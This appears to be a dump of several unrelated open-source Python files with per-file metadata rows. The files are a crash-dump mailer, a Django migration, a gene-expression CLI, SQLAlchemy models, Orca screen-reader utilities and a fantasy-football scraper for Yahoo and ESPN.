<h2>Extracted logs</h2>
<pre><code>
${logs}
</code></pre>
""")
body = Template(template).substitute(template_vars)
logging.info("Sending core alert from %s to %s", sender, recipient)
self.send_email(sender, recipient, subject, body)
def send_email(self, sender, recipient, subject, body):
conn = boto.ses.connect_to_region(self.config.get('Config', 'region'))
# noinspection PyTypeChecker
conn.send_email(sender, subject, None, [recipient], html_body=body)
def output_trace(self, epoch_time, trace):
template_vars = {
"hostname": self.hostname,
"binary": self.config.get('Config', 'bin'),
"formatted_time": format_time(epoch_time),
"trace": trace
}
template = textwrap.dedent("""
${binary} on ${hostname} crashed at ${formatted_time} with the
following back traces:
${trace}
""")
body = Template(template).substitute(template_vars)
self.out.write(body)
def archive_core(self, core):
command_string = self.config.get('Config', 'archive_command')
if command_string:
core_path = os.path.join(self.hostname, os.path.basename(core))
command_string = command_string.format(core, core_path)
logging.info(subprocess.check_output(command_string.split(' ')))
else:
logging.warn("No archive command, just removing core file")
os.remove(core)
def run(self, single_core):
core = single_core or self.find_core()
mode = self.config.get('Config', 'mode')
if core:
logging.info('Found core file %s', core)
epoch_time = os.path.getctime(core)
trace = self.get_trace(core)
if mode == "aws":
logs = self.find_logs(epoch_time)
self.send_alert(epoch_time, trace, logs)
self.archive_core(core)
elif mode == "local":
self.output_trace(epoch_time, trace)
else:
logging.fatal("Unknown MODE setting: %s", mode)
sys.exit(1)
else:
logging.info('No core file found for processing')
if __name__ == "__main__":
if len(sys.argv) > 1:
single_core = sys.argv[1]
else:
single_core = None
config_file = "/etc/core_file_processor.ini"
logging.basicConfig(level=logging.INFO)
config_parser = ConfigParser.ConfigParser({
"region": "us-east-1",
"cores": "/cores",
"log": "/host/syslog",
"log_filter": os.environ.get('CORE_LOG_FILTER'),
"core_filter": "stellar-core",
"hostname": socket.gethostname(),
"from": "%(hostname)s <ops+%(hostname)[email protected]>",
"to": os.environ.get('CORE_ALERT_RECIPIENT'),
"bin": "/usr/local/bin/stellar-core",
"archive_command": os.environ.get('CORE_ARCHIVE_COMMAND'),
"mode": os.environ.get('MODE', 'aws')
})
config_parser.add_section("Config")
config_parser.read(config_file)
mailer = CoreMailer(config_parser)
mailer.run(single_core)
| apache-2.0 | -9,167,132,196,704,341,000 | 32.984456 | 94 | 0.567465 | false | 3.835673 | true | false | false |
sloww/cntslinkgit | app_printer/migrations/0009_auto_20150531_1655.py | 1 | 4323 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import django_markdown.models
class Migration(migrations.Migration):
dependencies = [
('app_printer', '0008_auto_20150531_1624'),
]
operations = [
migrations.CreateModel(
name='CBase',
fields=[
('id', models.AutoField(primary_key=True, auto_created=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=300)),
('order_index', models.IntegerField(default=0)),
('title', models.CharField(blank=True, max_length=300)),
('meta_description', models.TextField(blank=True)),
('page_url', models.CharField(max_length=300)),
('img_url', models.CharField(blank=True, max_length=300)),
('description', django_markdown.models.MarkdownField()),
],
),
migrations.RemoveField(
model_name='article',
name='description',
),
migrations.RemoveField(
model_name='article',
name='id',
),
migrations.RemoveField(
model_name='article',
name='name',
),
migrations.RemoveField(
model_name='article',
name='set_url',
),
migrations.RemoveField(
model_name='brand',
name='description',
),
migrations.RemoveField(
model_name='brand',
name='id',
),
migrations.RemoveField(
model_name='brand',
name='logo_url',
),
migrations.RemoveField(
model_name='brand',
name='name',
),
migrations.RemoveField(
model_name='brand',
name='order_index',
),
migrations.RemoveField(
model_name='brand',
name='set_url',
),
migrations.RemoveField(
model_name='printer',
name='description',
),
migrations.RemoveField(
model_name='printer',
name='id',
),
migrations.RemoveField(
model_name='printer',
name='img_url',
),
migrations.RemoveField(
model_name='printer',
name='name',
),
migrations.RemoveField(
model_name='printer',
name='set_url',
),
migrations.RemoveField(
model_name='printer',
name='title',
),
migrations.RemoveField(
model_name='printtype',
name='description',
),
migrations.RemoveField(
model_name='printtype',
name='id',
),
migrations.RemoveField(
model_name='printtype',
name='name',
),
migrations.RemoveField(
model_name='printtype',
name='order_index',
),
migrations.RemoveField(
model_name='printtype',
name='set_url',
),
migrations.AddField(
model_name='article',
name='cbase_ptr',
field=models.OneToOneField(default=1, auto_created=True, serialize=False, primary_key=True, parent_link=True, to='app_printer.CBase'),
preserve_default=False,
),
migrations.AddField(
model_name='brand',
name='cbase_ptr',
field=models.OneToOneField(default=1, auto_created=True, serialize=False, primary_key=True, parent_link=True, to='app_printer.CBase'),
preserve_default=False,
),
migrations.AddField(
model_name='printer',
name='cbase_ptr',
field=models.OneToOneField(default=1, auto_created=True, serialize=False, primary_key=True, parent_link=True, to='app_printer.CBase'),
preserve_default=False,
),
migrations.AddField(
model_name='printtype',
name='cbase_ptr',
field=models.OneToOneField(default=1, auto_created=True, serialize=False, primary_key=True, parent_link=True, to='app_printer.CBase'),
preserve_default=False,
),
]
| gpl-2.0 | -4,347,683,951,444,904,000 | 30.786765 | 146 | 0.517927 | false | 4.517241 | false | false | false |
jmschrei/discern | analysis/cld.py | 1 | 1089 | # discern
# Contact: Jacob Schreiber ([email protected])
from cancer_analyses import *
import pandas as pd
import argparse
import sys
def parse_command_line():
'''
Parse the command line and return the parser.
'''
parser = argparse.ArgumentParser( description="Read in Data" )
parser.add_argument( '-n', action='store', type=file,
help='A CSV file of gene expression data for healthy patients.' )
parser.add_argument( '-c', action='store', type=file,
help='A CSV file of gene expression data for cancerous patients.' )
parser.add_argument( '-l', type=float, action='store', default=0.5,
help='A value of lambda to run DISCERN at.')
args = parser.parse_args()
return args
def run_analyses():
'''
Run the analyses indicated by the number of arguments passed in.
'''
parser = parse_command_line()
cancer = pd.read_csv( parser.c, index_col=0 ).T
normal = pd.read_csv( parser.n, index_col=0 ).T
discern_scores = run_discern( normal, cancer, cancer.columns, parser.l, sys.stdout )
def main():
print "a"
run_analyses()
if __name__ == '__main__':
main() | mit | -6,341,495,483,213,560,000 | 24.952381 | 85 | 0.694215 | false | 3.008287 | false | false | false |
arpho/mmasgis5 | mmasgis/mysql_sqlalchemy_class.py | 1 | 4833 | #!/usr/bin/python
# -*- coding: latin-1 -
from sqlalchemy import Column, Integer, Unicode,Unicode, ForeignKey, DateTime,Float,Boolean
from sqlalchemy import create_engine
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import backref, mapper, relation, sessionmaker
echo=False
#def __init__(self):
Base = declarative_base()
class Pv(Base):
__tablename__='pv'
pv_id =Column('pv_id',Integer, primary_key=True)
codice = Column(Unicode)
pref_mmas =Column(Unicode)
cod_mmas =Column(Integer)
certificato =Column(Boolean)
pv_mt = Column(Boolean)
cliente= Column(Boolean)
cod_cliente =Column(Unicode)
ragione_sociale =Column('nome1', Unicode(50))
titolare =Column('nome2', Unicode(50))
tc_istat_id=Column(Integer)
indirizzo =Column(Unicode(100))
cap =Column(Unicode)
comune =Column(Unicode)
provincia =Column(Unicode(2))
tel1 =Column(Unicode(20))
tel2 =Column(Unicode(20))
tel3 =Column(Unicode(20))
cf_pi =Column(Unicode)
fax =Column(Unicode)
sito =Column(Unicode)
email =Column(Unicode)
note =Column(Unicode)
data_aggiornamento =Column(DateTime)
tc_stato_id =Column(Integer)
ins_data =Column(DateTime)
ins_utente =Column(Integer)
mod_data =Column(DateTime)
mod_utente =Column(Integer)
class rel_pv_pot(Base):
#using_table_options(useexisting=True)
__tablename__='rel_pv_pot'
tc_clpot_id=Column(Integer)
ins_data =Column(DateTime)
ins_utente =Column(Integer)
mod_data =Column(DateTime)
mod_utente =Column(Integer)
pv_id=Column(Integer,primary_key=True)
tc_pot_id =Column(Integer,primary_key=True)
valore =Column(Float)
class tc_clpot(Base):
__tablename__='tc_clpot'
tc_clpot_id=Column(Integer,primary_key=True)
testo=Column(Unicode(255))
tc_stato_id=Column(Integer)
primario=Column(Boolean)
calc_autom=Column(Boolean)
valore_min=Column(Float)
ordine=Column(Integer)
ins_data =Column(DateTime)
ins_utente =Column(Integer)
mod_data =Column(DateTime)
mod_utente =Column(Integer)
class tc_pot(Base):
__tablename__='tc_pot'
tc_pot_id=Column(Integer, primary_key=True)
tc_clpot_id=Column(Integer)
testo =Column(Unicode(255))
tc_stato_id=Column(Integer)
ordine= Column(Integer)
coeff_min=Column(Float)
coeff_max=Column(Float)
ins_data =Column(DateTime)
ins_utente =Column(Integer)
mod_data =Column(DateTime)
mod_utente =Column(Integer)
class rel_pv_par(Base):
__tablename__='rel_pv_par'
ins_data =Column(DateTime)
ins_utente =Column(Integer)
mod_data =Column(DateTime)
mod_utente =Column(Integer)
pv_id =Column(Integer, primary_key=True)
tc_clpar_id=Column(Integer)
tc_par_id=Column(Integer, primary_key=True)
class tc_par(Base):
__tablename__='tc_par'
tc_par_id =Column(Integer, primary_key=True)
tc_clpar_id=Column(Integer)
testo=Column(Unicode(255))
tc_stato_id=Column(Integer)
ordine=Column(Integer)
ins_data =Column(DateTime)
ins_utente =Column(Integer)
mod_data =Column(DateTime)
mod_utente =Column(Integer)
class tc_clpar(Base):
__tablename__='tc_clpar'
tc_clpar_id= Column(Integer,primary_key=True)
tc_stato_id= Column(Integer)
testo=Column(Unicode(255))
ordine=Column(Integer)
ins_data =Column(DateTime)
ins_utente =Column(Integer)
mod_data =Column(DateTime)
mod_utente =Column(Integer)
class rel_pv_mar(Base):
__tablename__='rel_pv_mar'
pv_id=Column(Integer,primary_key=True)
tc_clmar_id=Column(Integer, primary_key=True)
ordine=Column(Integer,primary_key=True)
uso=Column(Float)
tc_mar_id=Column(Integer)
ins_data =Column(DateTime)
ins_utente =Column(Integer)
mod_data =Column(DateTime)
mod_utente =Column(Integer)
def __repr__(self):
return "pv_id: %s,tc_clmar_id: %s, uso:%s, ordine: %s"%(self.pv_id,self.tc_clmar_id,self.uso,self.ordine)
class tc_mar(Base):
__tablename__='tc_mar'
tc_mar_id=Column(Integer,primary_key=True)
testo=Column(Unicode(255))
tc_stato_id=Column(Integer)
ins_data =Column(DateTime)
ins_utente =Column(Integer)
mod_data =Column(DateTime)
mod_utente =Column(Integer)
def __repr__(self):
return "testo: %s, tc_mar_id: %d"%(self.testo,self.tc_mar_id)
class tc_clmar(Base):
__tablename__='tc_clmar'
tc_clmar_id=Column(Integer,primary_key=True)
tc_stato_id=Column(Integer)
testo=Column(Unicode(255))
ordine=Column(Integer)
ins_data =Column(DateTime)
ins_utente =Column(Integer)
mod_data =Column(DateTime)
mod_utente =Column(Integer)
def __repr__(self):
return "%s tc_clmar_id: %s, ordine: %s"%(self.testo,self.tc_clmar_id,self.ordine)
class tc_rel_clmar_mar(Base):
__tablename__='tc_rel_clmar_mar'
tc_clmar_id=Column(Integer, primary_key=True)
tc_mar_id=Column(Integer,primary_key=True)
ins_data =Column(DateTime)
ins_utente =Column(Integer)
mod_data =Column(DateTime)
mod_utente =Column(Integer)
def __repr__(self):
return "tc_clmar_id: %s,tc_mar_id:%s"%(self.tc_clmar_id,self.tc_mar_id)
| mit | -1,064,273,608,022,488,800 | 26.305085 | 108 | 0.725222 | false | 2.479733 | true | false | false |
ruibarreira/linuxtrail | usr/lib/python3/dist-packages/orca/scripts/apps/gnome-documents/script_utilities.py | 4 | 1531 | # Orca
#
# Copyright (C) 2013 The Orca Team.
#
# Author: Joanmarie Diggs <[email protected]>
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the
# Free Software Foundation, Inc., Franklin Street, Fifth Floor,
# Boston MA 02110-1301 USA.
__id__ = "$Id$"
__version__ = "$Revision$"
__date__ = "$Date$"
__copyright__ = "Copyright (c) 2013 The Orca Team."
__license__ = "LGPL"
import pyatspi
import orca.script_utilities as script_utilities
import orca.scripts.toolkits.gtk as gtk
class Utilities(gtk.Utilities):
def __init__(self, script):
gtk.Utilities.__init__(self, script)
def isReadOnlyTextArea(self, obj):
if obj.getRole() == pyatspi.ROLE_DOCUMENT_FRAME:
return False
return gtk.Utilities.isReadOnlyTextArea(self, obj)
def isTextArea(self, obj):
if obj.getRole() == pyatspi.ROLE_DOCUMENT_FRAME:
return True
return gtk.Utilities.isTextArea(self, obj)
| gpl-3.0 | 4,387,624,754,159,167,000 | 30.895833 | 68 | 0.700196 | false | 3.653938 | false | false | false |
BurntSushi/nflfan | nflfan/provider.py | 1 | 24616 | from __future__ import absolute_import, division, print_function
from collections import namedtuple
import json
import os
import re
import sys
import time
import requests
from bs4 import BeautifulSoup
import nfldb
import nflfan.config
__pdoc__ = {}
_user_agent = 'Mozilla/5.0 (X11; Linux x86_64)'
# _user_agent = 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2498.0 Safari/537.36'
# _user_agent = ''
"""
The user agent string is heuristically determined. Namely, I was having
problems getting some providers to authenticate with more vague user
agent strings.
You may want to use a different user agent string entirely if you're
writing your own provider.
"""
_urls = {
'yahoo': {
'owner': 'http://football.fantasysports.yahoo.com/f1/%s/teams',
'matchup': 'http://football.fantasysports.yahoo.com/f1/%s/'
'matchup?matchup_week=%d&ajaxrequest=1',
'roster': 'http://football.fantasysports.yahoo.com/f1/%s/%s?week=%d',
},
'espn': {
'owner': 'http://games.espn.go.com/ffl/leaguesetup'
'/ownerinfo?leagueId={league_id}&seasonId={season_id}',
'matchup': 'http://games.espn.go.com/ffl/scoreboard?'
'leagueId={league_id}&matchupPeriodId={week}'
'&seasonId={season_id}',
'roster': 'http://games.espn.go.com/ffl/playertable/prebuilt/'
'manageroster?leagueId={league_id}&teamId={team_id}'
'&seasonId={season_id}&scoringPeriodId={week}'
'&view=overview&context=clubhouse'
'&ajaxPath=playertable/prebuilt/manageroster'
'&managingIr=false&droppingPlayers=false&asLM=false',
},
}
def pp(soup):
print(soup.prettify().encode('utf-8'))
def eprint(*args, **kwargs):
kwargs['file'] = sys.stderr
args = ['[nflfan]'] + list(args)
print(*args, **kwargs)
def player_search(db, full_name, team=None, position=None):
"""
A thin wrapper around `nfldb.player_search` that tries searching
with `team` or `position` when given, but if no results are found,
then this returns the results of a search with just the full name.
This allows for a slightly out-of-date database to still provide
a match while also disambiguating players with the same name.
"""
if position not in nfldb.Enums.player_pos:
position = None
p, _ = nfldb.player_search(db, full_name, team=team, position=position)
if p is None and position is not None:
p, _ = nfldb.player_search(db, full_name, team=team, position=None)
if p is None and team is not None:
p, _ = nfldb.player_search(db, full_name, team=None, position=position)
if p is None and team is not None and position is not None:
p, _ = nfldb.player_search(db, full_name, team=None, position=None)
return p
class League (namedtuple('League',
'season phase ident prov_name name scoring conf')):
__pdoc__['League.season'] = \
"""The year of the NFL season for this league."""
__pdoc__['League.phase'] = \
"""The phase of the season: preseason, regular or post."""
__pdoc__['League.ident'] = \
"""
A unique identifier for this league. The type and format of
this value is provider dependent.
"""
__pdoc__['League.prov_name'] = \
"""The name of the provider for this league."""
__pdoc__['League.name'] = \
"""The name of this league from the configuration."""
__pdoc__['League.scoring'] = \
"""The `nflfan.ScoreSchema` for this league."""
__pdoc__['League.conf'] = \
"""
A dictionary of configuration settings. The keys and values in
this dictionary are provider dependent.
"""
def __init__(self, *args):
super(League, self).__init__(*args)
self._cache = {}
@property
def full_name(self):
return '%s.%s' % (self.prov_name, self.name)
def is_me(self, obj):
if not self.conf.get('me', None):
return False
if isinstance(obj, Roster):
return self.is_me(obj.owner)
elif isinstance(obj, Matchup):
return self.is_me(obj.owner1) or self.is_me(obj.owner2)
else:
return self.conf['me'].lower() in obj.name.lower()
def me(self, objs):
for obj in objs:
if self.is_me(obj):
return obj
return None
def owners(self, week):
return self._cached(week, 'owners')
def owner(self, week, ident):
for o in self.owners(week):
if o.ident == ident:
return o
return None
def matchups(self, week):
return self._cached(week, 'matchups')
def matchup(self, week, ident):
for m in self.matchups(week):
if m.owner1 is None or m.owner2 is None:
continue
if m.owner1.ident == ident or m.owner2.ident == ident:
return m
return None
def rosters(self, week):
return self._cached(week, 'rosters')
def roster(self, week, ident):
for r in self.rosters(week):
if r.owner.ident == ident:
return r
return None
def cache_path(self, week):
return os.path.join(nflfan.config.cache_path(),
str(self.season), str(self.phase), str(week),
self.full_name + '.json')
def _cached(self, week, key):
if week not in self._cache:
self._load(week)
return self._cache[week][key]
def _load(self, week):
raw = None
fp = self.cache_path(week)
try:
with open(fp) as f:
raw = json.load(f)
except IOError:
raise IOError(
"No cached data for week %d in %s could be found at %s\n"
"Have you run `nflfan-update --week %d` yet?"
% (week, self.full_name, fp, week))
d = {'owners': [], 'matchups': [], 'rosters': []}
for owner in raw['owners']:
d['owners'].append(Owner._make(owner))
for matchup in raw['matchups']:
o1 = None if matchup[0] is None else Owner._make(matchup[0])
o2 = None if matchup[1] is None else Owner._make(matchup[1])
d['matchups'].append(Matchup(o1, o2))
for roster in raw['rosters']:
o = Owner._make(roster[0])
r = Roster(o, roster[1], roster[2], [])
for rp in roster[3]:
r.players.append(RosterPlayer._make(rp))
d['rosters'].append(r)
self._cache[week] = d
def __str__(self):
return self.full_name
class Matchup (namedtuple('Matchup', 'owner1 owner2')):
__pdoc__['Matchup.owner1'] = \
"""
One of the two teams in this matchup represented as an
`nflfan.Owner` object.
"""
__pdoc__['Matchup.owner2'] = \
"""
One of the two teams in this matchup represented as an
`nflfan.Owner` object.
"""
def other(self, ident):
"""
Given an identifier for one of the owner's in this matchup,
return the `nflfan.Owner` of the other owner.
"""
assert ident in (self.owner1.ident, self.owner2.ident)
if ident == self.owner1.ident:
return self.owner2
else:
return self.owner1
def __str__(self):
return '%s vs. %s' % (self.owner1, self.owner2)
class Owner (namedtuple('Owner', 'ident name')):
__pdoc__['Owner.ident'] = \
"""
A unique identifier corresponding to this owner. The type
of this value is provider-dependent.
"""
__pdoc__['Owner.name'] = \
"""A string representing the name of this owner."""
def __str__(self):
return self.name
class Roster (namedtuple('Roster', 'owner season week players')):
__pdoc__['Roster.owner'] = \
"""
A `nflfan.Owner` object corresponding to the owner of this
roster.
"""
__pdoc__['Roster.players'] = \
"""
A list of `nflfan.RosterPlayer` objects corresponding to the
set of players on this roster.
"""
def new_player(self, pos, team, bench, player_id):
"""
A convenience method for creating a new `nflfan.RosterPlayer`
given the current roster.
"""
return RosterPlayer(pos, team, bench, self.season, self.week,
None, 0.0, None, player_id)
@property
def active(self):
return filter(lambda rp: not rp.bench, self.players)
@property
def benched(self):
return filter(lambda rp: rp.bench, self.players)
@property
def points(self):
"""Returns the total number of points for non-benched players."""
return sum(p.points for p in self.players if not p.bench)
def __str__(self):
s = []
for rp in self.players:
s.append(str(rp))
return '\n'.join(s)
class RosterPlayer (
namedtuple('RosterPlayer',
'position team bench season week '
'game points player player_id')):
__pdoc__['RosterPlayer.position'] = \
"""
A string corresponding to the position of the roster spot
occupied by this player. The possible values of this string are
provider dependent.
"""
__pdoc__['RosterPlayer.team'] = \
"""
A team abbreviation that this player belongs to. It must be a
valid nfldb team abbreviation and *cannot* be `UNK`.
"""
__pdoc__['RosterPlayer.bench'] = \
"""A boolean indicating whether this is a bench position or not."""
__pdoc__['RosterPlayer.season'] = \
"""The year of the corresponding NFL season."""
__pdoc__['RosterPlayer.week'] = \
"""The week number in which this roster was set."""
__pdoc__['RosterPlayer.game'] = \
"""
The `nfldb.Game` object for the game that this player played
in. If this roster position corresponds to a bye week, then
this attribute is set to `None`.
"""
__pdoc__['RosterPlayer.points'] = \
"""The total fantasy points for this roster player."""
__pdoc__['RosterPlayer.player'] = \
"""
A `nfldb.Player` object corresponding to this roster player.
This attribute is `None` by default, and is always `None` for
roster players corresponding to entire teams (e.g., defense).
"""
__pdoc__['RosterPlayer.player_id'] = \
"""
A player id string corresponding to the player in this roster
position and a player in nfldb. This may be `None` when the
roster player corresponds to an entire team. (e.g., A defense.)
"""
@property
def is_empty(self):
return self.team is None and self.player_id is None
@property
def is_defense(self):
return self.team is not None and self.player_id is None
@property
def is_player(self):
return self.player_id is not None
@property
def id(self):
if self.is_empty:
return 'Empty'
elif self.is_defense:
return self.team
else:
return self.player_id
@property
def name(self):
return self.id if not self.player else self.player.full_name
def __str__(self):
if self.game is not None and self.game.is_playing:
playing = '*'
else:
playing = ' '
return '%-6s %-4s %-20s %s%0.2f' \
% (self.position, self.team, self.name, playing, self.points)
class Provider (object):
"""
This class describes the interface that each fantasy football
provider must implement so that it can work with nflfan. In other
words, this is an abstract base class that should **not** be
instantiated directly.
All public members of this class must also be defined in each
provider implementation, including the class variables.
"""
provider_name = None
"""The name of the provider used in the configuration file."""
conf_required = ['scoring', 'league_name', 'season', 'phase', 'league_id']
"""A list of fields required for every provider."""
conf_optional = ['me']
"""A list of fields that are optional for every provider."""
def __init__(self, lg):
self._lg = lg
self._session = requests.Session()
self._session.headers.update(getattr(self, '_headers', {}))
def owners(self):
"""Returns a list of `nflfan.Owner` objects."""
assert False, 'subclass responsibility'
def matchups(self, week):
"""
Given a week number, this returns a list of `nflfan.Matchup`
objects describing the head-to-head matchups for `week`.
"""
assert False, 'subclass responsibility'
def roster(self, player_search, owner, week):
"""
Given a `nflfan.Owner` and a week number, this returns a
`nflfan.Roster` object. The `nflfan.Roster` contains a list of
`nfldb.Player` objects and their corresponding position on the
roster.
`player_search` should be a function that takes a full
player name and returns the closest matching player as a
`nfldb.Player` object. It should also optionally take keyword
arguments `team` and `position` that allow for extra filtering.
Note that the roster position is a string but the set of
possible values is provider dependent. It is used for display
purposes only.
"""
assert False, 'subclass responsibility'
def save(self, fp, player_search, week):
"""
Writes a JSON encoding of all the owners, matchups and rosters
for the given week to a file at `fp`.
`player_search` should be a function that takes a full
player name and returns the closest matching player as a
`nfldb.Player` object. It should also optionally take keyword
arguments `team` and `position` that allow for extra filtering.
"""
d = {
'owners': self.owners(),
'matchups': self.matchups(week),
}
# I'm hoping this doesn't hurt custom providers that don't need
# to do IO to fetch a roster.
def roster(owner):
return self.roster(player_search, owner, week)
# pool = multiprocessing.pool.ThreadPool(3)
# d['rosters'] = pool.map(roster, d['owners'])
d['rosters'] = map(roster, d['owners'])
try:
os.makedirs(os.path.dirname(fp))
except OSError:
pass
json.dump(d, open(fp, 'w+'))
def _request(self, url):
eprint('download %s' % url)
r = self._session.get(url)
soup = BeautifulSoup(r.text, 'html.parser')
if self._login_form(soup):
self._login()
r = self._session.get(url)
soup = BeautifulSoup(r.text, 'html.parser')
if self._login_form(soup):
raise IOError("Authentication failure.")
return r
def _login(self):
assert self._login_url is not None
soup = BeautifulSoup(self._session.get(self._login_url).text,
'html.parser')
if not self._login_form(soup):
# Already logged in!
return
form = self._login_form(soup)
params = self._login_params(soup)
for inp in soup.select('#hiddens input[type="hidden"]'):
params[inp['name']] = inp['value']
r = self._session.post('https://login.yahoo.com' + form['action'],
params=params)
return BeautifulSoup(r.text, 'html.parser')
def _login_params(self):
assert False, 'subclass responsibility'
def _login_form(self, soup):
assert False, 'subclass responsibility'
def __str__(self):
return self.__class__.provider_name
class Yahoo (Provider):
provider_name = 'yahoo'
conf_required = []
conf_optional = ['username', 'password']
_headers = {'User-Agent': _user_agent}
_login_url = 'https://login.yahoo.com/config/login'
def __init__(self, lg):
super(Yahoo, self).__init__(lg)
_, _, self._league_num = self._lg.ident.split('.')
def owners(self):
match_owner_link = re.compile('team-[0-9]+-name')
url = _urls['yahoo']['owner'] % self._league_num
soup = BeautifulSoup(self._request(url).text, 'html.parser')
owners = []
for link in soup.find_all(id=match_owner_link):
ident = self._owner_id_from_url(link['href'])
owners.append(Owner(ident, link.text.strip()))
return owners
def matchups(self, week):
mk_owner = lambda div: Owner(owner_id(div.a['href']), div.text.strip())
owner_id = self._owner_id_from_url
url = _urls['yahoo']['matchup'] % (self._league_num, week)
rjson = self._request(url).json()
soup = BeautifulSoup(rjson['content'], 'html.parser')
matchups = []
for matchup in soup.find('ul').children:
pair = list(matchup.find_all('div', class_='Fz-sm'))
if len(pair) == 1:
matchups.append(Matchup(mk_owner(pair[0]), None))
else:
matchups.append(Matchup(mk_owner(pair[0]), mk_owner(pair[1])))
return matchups
def roster(self, player_search, owner, week):
def to_pos(row):
return row.td.find(class_='pos-label')['data-pos'].strip().upper()
def to_name(row):
return row.find(class_='ysf-player-name').a.text.strip()
def to_team(row):
team_pos = row.find(class_='ysf-player-name').span.text.strip()
return nfldb.standard_team(re.search('^\S+', team_pos).group(0))
def rplayer(r, name, team, pos):
bench = pos == 'BN'
if name is None and team is None:
return r.new_player(pos, None, bench, None)
elif nfldb.standard_team(name) != 'UNK':
return r.new_player(pos, team, bench, None)
else:
player = player_search(name, team=team, position=pos)
return r.new_player(pos, team, bench, player.player_id)
match_table_id = re.compile('^statTable[0-9]+$')
url = _urls['yahoo']['roster'] % (self._league_num, owner.ident, week)
soup = BeautifulSoup(self._request(url).text, 'html.parser')
roster = Roster(owner, self._lg.season, week, [])
for table in soup.find_all(id=match_table_id):
for row in table.tbody.find_all('tr', recursive=False):
pos = to_pos(row)
try:
team, name = to_team(row), to_name(row)
roster.players.append(rplayer(roster, name, team, pos))
except AttributeError:
roster.players.append(rplayer(roster, None, None, pos))
return roster
def _owner_id_from_url(self, url):
return re.search('%s/([0-9]+)' % self._league_num, url).group(1)
def _login(self):
soup = super(Yahoo, self)._login()
if self._login_form(soup):
err_div = soup.find(id='mbr-login-error')
err_msg = 'Unknown error.'
if err_div:
err_msg = err_div.text.strip()
raise IOError('Login failed: %s' % err_msg)
def _login_params(self, soup):
return {
'username': self._lg.conf.get('username', ''),
'passwd': self._lg.conf.get('password', ''),
'signin': '',
# '.persistent': 'y',
'countrycode': '1',
# '_crumb': '8cSELfo475z',
# '_ts': str(int(time.time())),
# '_format': '',
# '_uuid': 'Q9JF85iYg9ax',
# '_seqid': '2',
# 'otp_channel': '',
}
def _login_form(self, soup):
return soup.find('form', id='mbr-login-form')
class ESPN (Provider):
provider_name = 'espn'
conf_required = []
conf_optional = ['username', 'password']
_headers = {'User-Agent': _user_agent}
_login_url = 'http://games.espn.go.com/ffl/signin?_=_'
def owners(self):
url = _urls['espn']['owner'].format(
league_id=self._lg.ident, season_id=self._lg.season)
soup = BeautifulSoup(self._request(url).text, 'html.parser')
owners = []
for td in soup.select('tr.ownerRow td.teamName'):
ident = self._owner_id_from_url(td.a['href'])
owners.append(Owner(ident, td.text.strip()))
return owners
def matchups(self, week):
owner_id = self._owner_id_from_url
url = _urls['espn']['matchup'].format(
league_id=self._lg.ident, season_id=self._lg.season, week=week)
soup = BeautifulSoup(self._request(url).text, 'html.parser')
matchupDiv = soup.find(id='scoreboardMatchups')
matchups = []
for table in matchupDiv.select('table.matchup'):
t1, t2 = list(table.find_all(class_='name'))
id1, id2 = owner_id(t1.a['href']), owner_id(t2.a['href'])
name1, name2 = t1.a.text.strip(), t2.a.text.strip()
o1, o2 = Owner(id1, name1), Owner(id2, name2)
matchups.append(Matchup(o1, o2))
return matchups
def roster(self, player_search, owner, week):
def to_pos(row):
pos = row.find(class_='playerSlot').text.strip().upper()
if pos == 'BENCH':
return 'BN'
return pos
def to_name(row):
name = row.find(class_='playertablePlayerName').a.text.strip()
# If this is the defense, apparently 'D/ST' is included in
# the name. Wtf?
return re.sub('\s+D/ST$', '', name)
def to_team(row):
tpos = row.find(class_='playertablePlayerName').a.next_sibling
tpos = tpos.strip(' \r\n\t*,|').upper()
# This is a little weird because the team name seems to run
# in with the position. Perhaps a weird encoding quirk?
if len(tpos) < 2:
return 'UNK'
elif len(tpos) == 2:
return nfldb.standard_team(tpos)
else:
team = nfldb.standard_team(tpos[0:3])
if team == 'UNK':
team = nfldb.standard_team(tpos[0:2])
return team
def rplayer(r, name, team, pos):
bench = pos == 'BN'
name_team = nfldb.standard_team(name)
if name is None and team is None:
return r.new_player(pos, None, bench, None)
elif name_team != 'UNK':
return r.new_player(pos, name_team, bench, None)
else:
player = player_search(name, team=team, position=pos)
return r.new_player(pos, team, bench, player.player_id)
url = _urls['espn']['roster'].format(
league_id=self._lg.ident, season_id=self._lg.season, week=week,
team_id=owner.ident)
soup = BeautifulSoup(self._request(url).text, 'html.parser')
roster = Roster(owner, self._lg.season, week, [])
for tr in soup.select('tr.pncPlayerRow'):
if tr.get('id', '') == 'pncEmptyRow':
continue
pos = to_pos(tr)
try:
team, name = to_team(tr), to_name(tr)
roster.players.append(rplayer(roster, name, team, pos))
except AttributeError:
roster.players.append(rplayer(roster, None, None, pos))
return roster
def _owner_id_from_url(self, url):
return re.search('teamId=([0-9]+)', url).group(1)
def _login(self):
soup = super(ESPN, self)._login()
if self._login_form(soup):
err_msg = []
for msg in soup.find_all('font', color='#ff0000'):
err_msg.append(msg.text.strip())
err_msg = '\n'.join(err_msg) if err_msg else 'Unknown error.'
raise IOError('Login failed: %s' % err_msg)
def _login_params(self):
return {
'username': self._lg.conf.get('username', ''),
'password': self._lg.conf.get('password', ''),
'submit': 'Sign In',
}
def _login_form(self, soup):
return soup.find('form', attrs={'name': 'loginForm'})
| unlicense | 1,224,262,221,576,702,000 | 33.188889 | 121 | 0.56252 | false | 3.717306 | false | false | false |
dallingham/regenerate | regenerate/writers/asm_equ.py | 1 | 2211 | #
# Manage registers in a hardware design
#
# Copyright (C) 2008 Donald N. Allingham
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
